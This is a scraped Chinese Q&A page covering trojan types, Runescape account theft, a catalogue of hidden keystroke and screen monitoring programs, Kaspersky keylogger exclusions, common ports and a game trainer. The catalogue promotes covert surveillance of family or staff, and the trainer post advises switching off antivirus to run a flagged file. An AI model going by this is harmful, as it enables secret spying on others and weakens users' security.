历史上对计算机木马的定义是,试图以有用程序的假面具欺骗用户允许其运行的一类渗透。请注意,过去的木马确实是这样,但现在它们已无需伪装自己。它们唯一的目的就是尽可能轻松地渗透并完成其恶意目标。“木马”已成为一个通用词,用来形容不属于任何特定类别的所有渗透。  由于其涵盖范围非常广,因此常被分为许多子类别。最著名的包括:  downloader – 一种能够从 Internet 下载其它渗透的恶意程序。  dropper - 一种设计用于将其它类型恶意软件放入所破坏的计算机中的木马。  backdoor - 一种与远程攻击者通信,允许它们获得系统访问权并控制系统的应用程序。  keylogger –(按键记录程序),是一种记录用户键入的每个按键并将信息发送给远程攻击者的程序。  dialer - 是用于连接附加计费号码的程序。用户几乎无法注意到新连接的创建。Dialer 只能对使用拨号调制解调器(现在已很少使用)的用户造成破坏。  木马通常采用带有扩展名 .exe 的可执行文件形式。如果计算机上的文件被检测为木马,建议您将其删除,因为它极有可能包含恶意代码。  著名木马示例包括: NetBus、Trojandownloader.Small.ZL、Slapper
2023-07-15 09:17:482

Runescape...Cheat,hack,scam,,,

cheat 同埋 scam 差不多,两者都解作哄骗欺诈,但hack多是用sofare 或programme 才做到的。 Cheat 和scam 要视乎欺诈者的哄骗技巧、目标的智慧和顺服程度等,它们有几种方法,你可参考这条题目:「To all of runescape"s player」,网址系 .knowledge.yahoo/question/?qid=7006071302309 而欺诈者的目标可以系$$、pass、items(armour rare items...)。 Hack 需要有特别programme或sofare,有d人叻o既会自己创造一种programme出o黎,但只hack 到pass,最具代表性未就系keylogger 罗,hacker 就可以透过得到的资料log in 受害者个acc. ,跟住接收所有acc. 入面的items haha,but犀利的hacker 可以靠程式直接入侵人o地电脑,唔需要keylogger都可以知道哂受害者资料。 参考: 小妹罗~~~ =P
2023-07-15 09:18:071

java中如何将输出结果到txt文件中

FileWriter PrintWriter 和 System.out.println() 相同的使用方法了~~~~
2023-07-15 09:18:141

监视系统文件夹被写入,防止后台安装等操作的软件有没有

Geek Superhero V1.2文件大小:2,558KB 更新时间: 2004-10-23 下载次数:58次 软件星级:★★★Geek Superhero 可以即时地监测你的电脑,当你的电脑有改变的时候,它会立刻提示你,从而让你作出选择。软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版DirSpy V2.8.0.1文件大小:2,745KB 更新时间: 2004-10-10 下载次数:57次 软件星级:★★★DirSpy可说是FileSpy的加强版,有别于FileSpy的一次只可以监控一个文件,DirSpy可以监控一个文件夹中下的所有文件。软件分类:系统监视 操作系统:Windows 95/98/NT/2000 授权方式:试用版系统监视器(System Spy) V3.4文件大小:349KB 更新时间: 2004-10-9 下载次数:57次 软件星级:★★★程序随系统启动在后台运行,不在任务栏或 Ctrl+Alt+Del窗口中显示,实现深度隐藏并同时监视系统,在任意时刻输入显示窗口的密码(第一次为:hello)便会显示 系统监视器 程序窗口。可以随时察看监视纪录,监视纪录以天为单位。软件分类:系统监视 操作系统:Windows 95/98/Me 授权方式:试用版Keyboard Spectator Pro V3.32文件大小:1,340KB 更新时间: 2004-10-27 下载次数:56次 软件星级:★★★如果你是想知道小孩如何使用计算机的家长,或者担心自己的计算机借给朋友时遭到滥用,该怎么办呢?如果不方便在别人的后面盯着看,那就让 Keyboard Spectator 代劳吧。它可以帮你监视计算机上所有按过的计算机按键,并在不让对方发现的情况下悄悄执行纪录的工作。软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版Family Keylogger V2.80文件大小:115KB 更新时间: 2004-10-10 下载次数:55次 软件星级:★★★Family Keylogger 是个计算机监控软件,它能以详细的 Log 文本文件将其它使用者的档案执行纪录条列纪录下来,只要调整模式为隐藏模式即开始纪录,软件的隐藏性佳,能消失于操作系统中的所有选单或安装纪录,让他人无法察觉此软件的存在。软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版Auto Keylogger V5.2文件大小:497KB 更新时间: 2004-10-10 下载次数:54次 软件星级:★★★通过记录下你键盘的敲击,从而可以监测到你的会话,密码以及网上活动等。软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版飞键精灵 V2.0文件大小:1,470KB 更新时间: 2004-10-9 下载次数:51次 软件星级:★★★飞键精灵是一个非常酷的软件,它可以将你的鼠标键盘的动作记录下来,并按指定的次数和速度进行重放。还可以为这些动作设置一个快捷键。它的主要应用有①计算机操作教学,把你的操作记录到文件,别人只要有这个文件和软件就可以重复你的操作。 ②记录重复性工作,每次只需软件自动完成。如果这项工作每天重复一次,可以为这项工作设置一个快捷键,每天只需按一下键盘。如果这项工作就是1千次的连续重复,可以设置重复次数,让软件自动快速完成。 ③如果你玩游戏,例如格斗游戏,一个招式必须快速的连按几个键,你可以为这些动作设置一个快捷键。这样,就没人可以打过你了。 ④可以将任何一文件夹、...软件分类:系统监视 操作系统:Windows 95/98/NT/2000 授权方式:试用版Windows超级监视 V3.0文件大小:171KB 更新时间: 2004-10-9 下载次数:51次 软件星级:★★★1.你是否遇到这种情况,当别人用你的电脑时,你希望知道他在你的电脑上作了什么动作,删除了什么文件!2.你是否遇到这种情况,有时一些软件在安装的时候,莫名的往硬盘里写了一些东西!你是不是想知道呢?3.如果不小心忘记了CMOS的密码,应该怎么办?4.如果不小心忘记了屏幕保护的密码,应该怎么办?5.想查看Windows中的******,而又不想动鼠标,应该怎么办?6.想查看Windows的进程?7.想查看CPU的使用情况?8. 想查看内存中运行的软件?9.希望通过软件调用常用的工具!10.可以把软件监视的结果保存为文本文档!11.可以设置为软件自启动,而且自启动时隐藏!现在超级监视可以为你解决这个问题...软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版pcLog-电脑日志 V5.30文件大小:925KB 更新时间: 2004-10-9 下载次数:51次 软件星级:★★★你的同事和家人在你的机器上作了什么?他们是不是使用了你的工作帐号或者玩游戏;你的孩子趁家长不在是不是浏览了一些不应该去的网站;你负责的局域网中的用户是不是没有工作,而是在玩游戏。这些事情你可能都一无所知,pcLog软件能够确切的告诉你:他们已经做的和正在做的一切事情!pcLog能记录输入的汉字和鼠标、键盘(包括小键盘)的动作,还能记录互联网浏览地址,可以定时、定项的记录,并能通过局域网或广域网随时对目标机器查阅历史记录和用户屏幕,或者通过互联网发送历史记录文件,并可以对记录进行保存和管理。还能够对服务端程序进行卸载、更名、停止运行和自动升级等控制,非常适合家长、老板管理自己的机器和网络管理员管...软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版中天卫士 V3.52 单机版文件大小:12,233KB 更新时间: 2004-10-9 下载次数:50次 软件星级:★★★中天卫士是一款功能强大的电脑监控管理软件。与众多监控软件不同,中天卫士不是紧紧监控浏览器或网址,而是监控所有的电脑操作和应用程序,并记录电脑操作和运行情况。中天卫士采用关键字检测技术,无需一个不停更新的庞大的监测库或网址库。中天卫士是电脑和网络安全、健康使用的保证,适用于学校、家庭、企业、机房、网吧、公用电脑等。软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版Desktop Surveillance Personal V6.0.3文件大小:2,676KB 更新时间: 2004-10-9 下载次数:49次 软件星级:★★★当你不在的时候,总是觉得计算机好象被别人动过。这个软件能够帮上你的忙。当你不在时,它能够监视你计算机的一切活动,包括浏览网页、e- mail、聊天室等等。它会在幕后纪录键盘活动以及撷取屏幕内容,同时它还会作成一份关于所有使用者的详细报告,包括网站、聊天室、新闻群组、游戏、档案,你可以在你回来之后看这份报告或是让他马上把报告从e-mail或是ftp传给你。软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版中天卫士 V3.52 工作站版文件大小:12,401KB 更新时间: 2004-10-9 下载次数:41次 软件星级:★★★中天卫士是一款功能强大的电脑监控管理软件。与众多监控软件不同,中天卫士不是紧紧监控浏览器或网址,而是监控所有的电脑操作和应用程序,并记录电脑操作和运行情况。中天卫士采用关键字检测技术,无需一个不停更新的庞大的监测库或网址库。中天卫士是电脑和网络安全、健康使用的保证,适用于学校、家庭、企业、机房、网吧、公用电脑等。软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版Easy Photo Grabber V1.3文件大小:1,391KB 更新时间: 2004-10-10 下载次数:41次 软件星级:★★★Easy Photo Grabber 是一款监控软件。可以对家庭、办公室、商场以及其它任何你需要监视的地方进行监控。能够让你的个人电脑很容易地变成音频监视系统。可调动态监视功能可以让你只捕捉任何你感兴趣的东西。使用其内置的图片浏览器你可以直接浏览、打印,滚动以及缩放图片!软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版Activity Logger V2.5文件大小:1,135KB 更新时间: 2004-10-10 下载次数:41次 软件星级:★★★本软件是一款监视软件,当你不在的时候,它可以帮你记录下你的孩子或你的员工,使用电脑的情况,让你对他们的活动了如指掌。软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版SPYEX V1.0 1文件大小:3,054KB 更新时间: 2004-10-10 下载次数:41次 软件星级:★★★当你离开你的电脑的时候,SPYEX 可以帮你监视和记录在你电脑上的各种活动,包括:键盘的敲击记录、应用程序的执行情况、收发的邮件信息以及网络的浏览活动。软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版屏幕监督 V3.57文件大小:10,173KB 更新时间: 2004-10-10 下载次数:39次 软件星级:★★★你想了解你的员工在上班时是否上网聊天或打游戏?你的孩子在家是否游览不良网站?你离开电脑时是否有人动过你的电脑?屏幕监督软件来帮您解决这些问题,该软件每隔若干秒将电脑的屏幕拷贝下来,并记录电脑何时运行了什么程序,在您回到电脑旁边时就可以知道您的电脑都做了些什么事情。软件分类:系统监视 操作系统:Windows 95/98/NT/2000 授权方式:试用版NetSpy V3.0 Build 2003.04.18文件大小:2,438KB 更新时间: 2004-10-9 下载次数:39次 软件星级:★★★以自动记录通过你的PC机访问过的 Internet站点。它在工作时很隐蔽,你可以知道别人的上网使用纪录,支持以下的浏览器:Netscape Navigator, Microsoft Internet Explorer, AOL ,Prodigy。软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版Ghost Keylogger V3.80文件大小:611KB 更新时间: 2004-10-9 下载次数:39次 软件星级:★★★Ghost Keylogger 可以驻留在后台,悄悄的记录下所有的按键。软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:了如指掌 V1.1文件大小:388KB 更新时间: 2004-10-10 下载次数:38次 软件星级:★★★当计算机被多个人同时使用的时候,常常苦恼于自己的爱机被人折腾却又无技可施,特别是在有事外出的时候,更是完全不知自己的电脑在哪些时候使用过,使用了多久。本程序即是专为此功能要求而开发。程序由两部分组成,一个监视端 SystemPlice.exe 和一个“日志查看器”。您只需要把监视端复制到任意目录下运行一次(...软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版SnapKey: Parental Internet Monitor V2.0文件大小:655KB 更新时间: 2004-10-10 下载次数:37次 软件星级:★★★本软件是一个很好的,父母了解孩子上网情况的软件,它在后台运行,不易被发觉,记录下计算机的所有运行情况。软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版Winvestigator V2.5文件大小:796KB 更新时间: 2004-10-9 下载次数:37次 软件星级:★★★Winvestigator可以监视你电脑的使用情况,为你纪录下你电脑所连结过的网站、所输入过的字串、以及所有使用过的程序。它是以隐藏的方式在开机时执行,并且随即将自己隐藏起来,就算对方稍具有电脑知识也无法发现Winvestigator程序的存在。Winvestigator会将所有使用纪录文件以加密的方式储存,就算对方在硬盘中找到纪录文件,他也无法得知你就算记录了些什么东西。软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版NETObserve V2.98文件大小:1,075KB 更新时间: 2004-10-10 下载次数:36次 软件星级:★★★ExploreAnywhere的NetObserve有许多有用的监视和系统管理功能。该程序可以按照不同窗口记录键盘内容;可以记录所访问的 URL、聊天会话以及其他活动;可以记录打印机使用情况;可以拍摄屏幕快照(而且这种快照不仅仅只包含当前活动的窗口信息);可以读取、移动和删除用户的文件和目录;甚至还可以监视连接到系统的Web摄像机。此外,NetObserve还有一个简单的Web过滤器,能够阻塞特定的网站并记录试图访问这些网站的请求。不过,NetObserve也有几个令人沮丧的缺点。结论: 无论用于何种目的,使用NetObserve都是很危险的。软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版Visual Log V2.02文件大小:138KB 更新时间: 2004-10-10 下载次数:34次 软件星级:★★★这个程序的基本功能是事件纪录,可以纪录用户所运行的所有程序,以及在这些程序中的键盘和鼠标动作,并且可以把这些结果发送到网络中的另一台机器上记录,并且在图形界面中进行回放和查看,所以正如它的名字 -- visual log 主要支持以下一些特性: 配置简单易于使用支持通过网络多计算机监控可以在任务管理器中隐藏 ,并且无法杀掉提供密码保护功能 agent程序占用资源极小内置日志分析和查看程序允许隐/显任务栏小图标支持windows nt/2000/xp/2003软件分类:系统监视 操作系统:Windows NT/2000/XP/2003 授权方式:试用版Groone"s Macroer V2.6.6文件大小:4,130KB 更新时间: 2004-10-9 下载次数:33次 软件星级:★★★宏记录工具,能帮你完成自动重复的工作,而无需使用脚本语言编制,用这个软件来记录你的操作,然后存储,即可重复播放。软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版KillWindow窗口终结者 V3.0文件大小:6,388KB 更新时间: 2004-10-9 下载次数:32次 软件星级:★★★KillWindow窗口终结者以一个小窗口为单位监视目前计算机正在运行的所有程序(或打开的窗口),根据你的设置禁止某个程序的运行(或某个窗口显示),将本软件安装到你的机子里面,可以有效地防止你的个人隐私不被泄露,防止别人在你的计算机上运行你不想让别人运行的软件。软件分类:系统监视 操作系统:Windows 98/Me/2000/XP 授权方式:试用版Faber Toys V2.6 Build 52文件大小:1,905KB 更新时间: 2004-10-10 下载次数:31次 软件星级:★★★Faber Toys是为高级电脑用户开发的工具。可以用这个工具看出电脑中正在运行什么程序、并提供详细的列表。对程序员也非常有用,可用这个工具跟踪你开发的软件。该工具运用了FPL(Fast Property Load)技术来保证在大多数机器上能够稳定地运行。软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版Keyboard Guardian V1.02.0056文件大小:1,567KB 更新时间: 2004-10-9 下载次数:31次 软件星级:★★★Keyboard Guardian可以监视你的键盘和鼠标的动作,同时产生一个记录文件!软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版Key Thief V2.0文件大小:2,342KB 更新时间: 2004-10-9 下载次数:31次 软件星级:★★★能够记录从系统启动到关机所有的键盘按键,还可以保存整个屏幕后台运行,不会在任务列表里显示。软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版KeyKey 2000 V1.25文件大小:132KB 更新时间: 2004-10-9 下载次数:30次 软件星级:★★★能够记录从系统启动到关机所有的键盘按键。记录所有曾经被按过的按键,以及被开启的视窗的标题,甚至连开机和关机时间也都通通会被KeyKey记录下来。软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版神鹰监控 V1.0文件大小:1,741KB 更新时间: 2004-10-9 下载次数:30次 软件星级:★★★用于家长、公司管理者,使其不在场时可以了解和控制对本电脑的使用,并作出记录。例如可以设定:1、在本机不能用QQ上网聊天,不能玩某个游戏,发现的话可以立即/x分钟后关闭或者使其某一个按钮失效或消失,并作出记录。2、在本机指定某一个QQ号不能用,其它的号均可用。3、过滤不应使用的网站,如色情、游戏网站等。本软件的设置程序和执行程序分离,设置后生成一个执行程序,设置数据已经打包进入执行程序,执行程序只有一个.exe文件,有几十KB,开机自启动,不在任务栏显示,按启动热键任务列表不显示。主文件名可任意更改,报告文件名可任意设置,故隐蔽性极强。软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版下载地址:http://download.it168.com/down2.asp?b_id=08&s_id=0808&letter=&csort=hits&page=1&cname=---------------------分割线--------------------------------你这种情况推荐使用pcLog-电脑日志 V5.30文件大小:925KB 更新时间: 2004-10-9 下载次数:51次 软件星级:★★★你的同事和家人在你的机器上作了什么?他们是不是使用了你的工作帐号或者玩游戏;你的孩子趁家长不在是不是浏览了一些不应该去的网站;你负责的局域网中的用户是不是没有工作,而是在玩游戏。这些事情你可能都一无所知,pcLog软件能够确切的告诉你:他们已经做的和正在做的一切事情!pcLog能记录输入的汉字和鼠标、键盘(包括小键盘)的动作,还能记录互联网浏览地址,可以定时、定项的记录,并能通过局域网或广域网随时对目标机器查阅历史记录和用户屏幕,或者通过互联网发送历史记录文件,并可以对记录进行保存和管理。还能够对服务端程序进行卸载、更名、停止运行和自动升级等控制,非常适合家长、老板管理自己的机器和网络管理员管...软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版
2023-07-15 09:18:221

卡巴斯基总是提示检测到键盘记录!!急急急

安装卡巴2009后频繁检测到键盘记录器,无法解决,怀疑是中了病毒.其实大家遇到键盘记录器时先进行以下判断:你是否运行了支付宝,网银控件等网上交易类的软件,是否运行了一些游戏例如:QQ堂等,如果有将其关闭后看看是否还有检测到键盘记录器.如果没有检测到了那一般就可以确定是这些软件自带的键盘记录器导致卡巴报警.其实很多软件都有包含键盘记录器如之前所说的支付宝,网银控件等等都有.这些都是正常的.再者很多人反映键盘记录器一直跳出窗口很烦.而且没有添加排除威胁的选项,只能一直点击允许,下面我以目前最常见的含有键盘记录器软件淘宝的支付保,,最为对象向大家介绍如何添加排除支付宝的键盘记录主要靠ALIDEVICE来进行相关操作如下1、打开卡巴的主界面点击设置2、选择排除和威胁,点击信任区域3、选择排除规则,点击添加4、"对象"前面的钩去掉,威胁类型前打钩5、选择威胁类型,掩码输入keylogger,高级设之前打钩输入"DRIVERALIDEVICE"6、然后点击"保护组建"7、打钩指定为"主动防御"8、最后点击确定即可解决问题。
2023-07-15 09:18:301

为何计算机要分那么多端口?

如果你把家里就改成一个房间,客厅卧室卫生间都在一起方便吗?
2023-07-15 09:18:412

一个木马,无危害不知道有什么问题求大神解析~谢谢

木马病毒的危害都不小,你在下载安装软件前一定要检测确认无病毒后再安装。
2023-07-15 09:19:003

诺顿和木马杀客都无法消灭的病毒,恳请高手帮助?

用卡巴加EWIDO~~~谁还用诺顿阿!
2023-07-15 09:19:157

键盘鼠标驱动与游戏冲突怎么办???~~ 这个算么?

可以换个系统支持XP或者 重装游戏 在不信就换一套键盘鼠标 推荐网游专用的
2023-07-15 09:19:525

IP地址里面的数字代表什么啊?

可以看成是一个ID
2023-07-15 09:20:117

有哪些是TCP/UDP/IP常用端口?

21端口:21端口主要用于FTP(File Transfer Protocol,文件传输协议)服务。23端口:23端口主要用于Telnet(远程登录)服务,是Internet上普遍采用的登录和仿真程序。25端口:25端口为SMTP(Simple Mail Transfer Protocol,简单邮件传输协议)服务器所开放,主要用于发送邮件,如今绝大多数邮件服务器都使用该协议。53端口:53端口为DNS(Domain Name Server,域名服务器)服务器所开放,主要用于域名解析,DNS服务在NT系统中使用的最为广泛。67、68端口:67、68端口分别是为Bootp服务的Bootstrap Protocol Server(引导程序协议服务端)和Bootstrap Protocol Client(引导程序协议客户端)开放的端口。69端口是为TFTP(Trival File Tranfer Protocol,次要文件传输协议)服务开放的,TFTP是Cisco公司开发的一个简单文件传输协议,类似于FTP。不过与FTP相比,TFTP不具有复杂的交互存取接口和认证控制,该服务适用于不需要复杂交换环境的客户端和服务器之间进行数据传输。 79端口:79端口是为Finger服务开放的,主要用于查询远程主机在线用户、操作系统类型以及是否缓冲区溢出等用户的详细信息。 80端口:80端口是为HTTP(HyperText Transport Protocol,超文本传输协议)开放的,这是上网冲浪使用最多的协议,主要用于在WWW(World Wide Web,万维网)服务上传输信息的协议。 99端口:99端口是用于一个名为“Metagram Relay”(亚对策延时)的服务,该服务比较少见,一般是用不到的。109、110端口:109端口是为POP2(Post Office Protocol Version 2,邮局协议2)服务开放的,110端口是为POP3(邮件协议3)服务开放的,POP2、POP3都是主要用于接收邮件的。111端口:111端口是SUN公司的RPC(Remote Procedure Call,远程过程调用)服务所开放的端口,主要用于分布式系统中不同计算机的内部进程通信,RPC在多种网络服务中都是很重要的组件。 113端口:113端口主要用于Windows的“Authentication Service”(验证服务)。 119端口:119端口是为“Network News Transfer Protocol”(网络新闻组传输协议,简称NNTP)开放的。135端口:135端口主要用于使用RPC(Remote Procedure Call,远程过程调用)协议并提供DCOM(分布式组件对象模型)服务。137端口:137端口主要用于“NetBIOS Name Service”(NetBIOS名称服务)。 139端口:139端口是为“NetBIOS Session Service”提供的,主要用于提供Windows文件和打印机共享以及Unix中的Samba服务。 143端口:143端口主要是用于“Internet Message Access Protocol”v2(Internet消息访问协议,简称IMAP)。 161端口:161端口是用于“Simple Network Management Protocol”(简单网络管理协议,简称SNMP)。 443端口:443端口即网页浏览端口,主要是用于HTTPS服务,是提供加密和通过安全端口传输的另一种HTTP。 554端口:554端口默认情况下用于“Real Time Streaming Protocol”(实时流协议,简称RTSP)。 1024端口:1024端口一般不固定分配给某个服务,在英文中的解释是“Reserved”(保留)。
2023-07-15 09:20:313

我注册了一个世纪佳缘网!感觉他们就是在骗钱!

知道就好呀,现在这类的网赚主要就是赚这个会员费或者是VIP
2023-07-15 09:20:525

求生化危机41.01版的修改器,要安全无毒的。大神们帮帮忙

《生化危机4》v1.10修改器(三款) + 36 http://www.qiyun.org/html/600/97067.htm 绝对无毒,有也是误报 Ver FINAL.2 (+36版) 更新日志 (1)本修改器,有对应亚洲版1.10版本,欧洲版1.10版本及美商艺电/香港通用中文版 (2)美商艺电/香港通用中文版是需放入游戏DVD光碟的版本 (3)同样有繁体中文专用版及简体中文专用版两种版本 (4)栏位打散全部重新编排 (5)去除掉开启功能及关闭功能的音效 (6)修正弹夹不减[原"弹夹使用不减"]在香港中文版中无法使用的问题(这个只有美商艺电/香港通用中文版才有) (7)重置全部功能快捷键设定如下 [1]主角+Ashley的HP不减(开启=F1,关闭=1) [2]弹药+弓箭不减(开启=F2,关闭=2) [3]手榴弹+鸡蛋不减(开启=F3,关闭=3) [4]回复道具使用不减(开启=F4,关闭=4) [5]无视攻击(开启=F5,关闭=5) [6]锁定敌人行动(开启=F6,关闭=6) [7]弹夹不减(美商艺电版:开启=Ctrl + F6,关闭=Ctrl + 6 ; 香港版:开启=Alt + F6,关闭=Alt + 6 ; 其他版:开启=F7,关闭=7) [8]寄生虫去除雷射枪(P.R.L. 412)能源全满(开启=F8,关=8) [9]敌人一击必杀(开启=F9,关=9) [10]购买+改造免费[武器商人区](开启=Ctrl + Z,关闭=Z) [11]里昂篇全部可买物品+改造(开启=Ctrl + L)[只写入数值] [12]艾达篇全部可买物品(开启=Ctrl + A)[只写入数值] [13]游戏难易度 等级Amateur = Alt + 1 (开启/关闭) 等级Easy = Alt + 2 (开启/关闭) 等级Normal = Alt + 3 (开启/关闭) 等级Professional = Alt + 4 (开启/关闭) [14]人物服装 Leon : 皮夹克 = Shift + 1 (开启/关闭) 战斗服 = Shift + 2 (开启/关闭) 防弹衣 = Shift + 3 (开启/关闭) 2代警察服 = Shift + 4 (开启/关闭) 黑手党服 = Shift + 5 (开启/关闭) Ashley : 短裙= Shift + 1 (开启/关闭) 白色礼服 = Shift + 2 (开启/关闭) 铠甲= Shift + 3 (开启/关闭) Ada : 2代短裙 = Shift + 1 (开启/关闭) 特攻装 = Shift + 2 (开启/关闭) 旗袍= Shift + 3 (开启/关闭) [15]人物乱入 Leon = Alt + Num 1(数字区) (开启/关闭) Ashley = Alt + Num 2(数字区) (开启/关闭) Ada = Alt + Num 3(数字区) (开启/关闭) Hunk = Alt + Num 4(数字区) (开启/关闭) Krauser = Alt + Num 5(数字区) (开启/关闭) Wesker = Alt + Num 6(数字区) (开启/关闭) [16]初期服装[影响正篇游戏Ashley服装] 初期服装 = Ctrl + Num 1(数字区)[短裙] (开启/关闭) 隐藏服装1= Ctrl + Num 2(数字区)[白色礼服] (开启/关闭) 隐藏服装2 = Ctrl + Num 3(数字区)[铠甲] (开启/关闭) [17]金钱(PTAS) = Ctrl + P (开启/关闭) [18]道具栏最大化 = Ctrl + B (开启/关闭) [19]角色HP上限 = Ctrl + H [只写入数值] [20]佣兵模式(六项) = Ctrl + M (开启/关闭) [21]武器改造等级(四项) = Ctrl + W (开启/关闭) [22]命中率100% = F11(开启/关闭),存档次数0次 = F11(开启/关闭),死亡次数0次 = F11(开启/关闭) [23]杀敌999 = F12(开/关),游戏时间 = F12(开启/关闭) (注:部分没有按快捷键的话,该功能是不会自动开启的!!) ************************[备注]************************** 1.香港中文版已经过测试可对应,请下载美商艺电/香港通用中文版! 2.因为游侠汉化版本未经过测试过,所以不确定是否能够对应所有的游侠汉化版本! (再次强调:本系列修改器均不支持游侠汉化版本(不含以前的版本!)) 3.部分防毒软体(如:Nod32)会把此修改程式误判成木马或病毒程式! (如有出现误判成木马或病毒程式情况只要把网路断线,把防毒软体关掉再运行修改器就不会有问题!) (注:你的系统资料夹WindowsSystem32中会出现H@tKeysH@@k.DLL这个档,有些防毒程式 会误判成Keylogger.HotKeysHook.A <- 这个木马) 4."里昂篇全部可买物品+改造"及"艾达篇全部可买物品"是指武器商人处,不是指现在的武器! 你到武器商人处先按下"里昂篇全部可买物品+改造或"艾达篇全部可买物品" 再和他说话后,你会发现游戏中可以购买全武器+全武器改造项目全都出来了! 艾达篇则是全武器,没有武器改造项目! 当然你在第一轮玩时,就可以买到所有的隐藏武器!! 5.本系列修改器均尚未在 Windows Vista 系统上测试,所以不确定是否能够对应 Windows Vista 系统! 6.请注意你的恶灵古堡(生化危机)4标题是否为biohazard 4(欧洲五语言版为resident evil 4)否则修改器将无法使用!! 7.请使用最新版的 WinRAR 3.70 解压缩,否则可能解压缩时会发生错误(本人用最新版的压缩程式!!) 8.请下载适合属于你作业系统语言的版本! (注:本修改器只能在 Windows 系统(不含Vista)上运行)
2023-07-15 09:21:071

UDP5566端口是干什么用的?

不知道你还有这样看这个东西的说明书它就会有介绍。
2023-07-15 09:21:172